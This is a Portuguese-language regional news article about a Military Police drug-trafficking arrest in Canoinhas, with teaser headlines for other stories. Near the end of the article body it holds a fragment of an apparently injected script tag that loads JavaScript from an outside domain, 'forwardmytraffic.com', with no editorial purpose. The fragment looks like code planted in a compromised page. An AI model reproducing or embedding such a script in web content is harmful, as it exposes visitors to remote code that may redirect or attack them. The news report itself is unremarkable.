InícioDestaquePM DE CANOINHAS: FLAGRANTE DE TRAFICO DE DROGAS

PM DE CANOINHAS: FLAGRANTE DE TRAFICO DE DROGAS

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

No início da noite de terça-feira, 01, foi efetuado uma denúncia ao Copom, que um veículo Subaru se encontrava vendendo entorpecentes em uma Praça da área central, no município de Canoinhas.

 

 

As equipes da PM efetuaram rondas, porém o veículo não foi localizado. Após algumas horas, pelo sistema de vídeo monitoramento do Copom, foi visualizado o referido veículo em frente a uma conveniência, após a saída do veículo foi comunicado aos policiais para uma possível abordagem, porém sem êxito.

 

 

Na madrugada de quarta-feira, 02, por volta da 1h25, os ocupantes do veículo retornaram a conveniência com outro veículo, um VW Gol de cor prata. Equipes da PM efetuaram a abordagem, sendo que no referido veículo se encontravam três jovens.

 

Os policiais visualizaram quando um dos jovem, que estava do lado do caroneiro, ao sair dispensou uma lata, dentro da mesma continha cinco unidades de LSD, dois comprimidos de êxtase, sete gramas de maconha e uma semente de substância semelhante à maconha. Que o jovem com 20 anos de idade assumiu a propriedade das substâncias. Diante dos fatos os envolvidos foram conduzidos para providencias.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.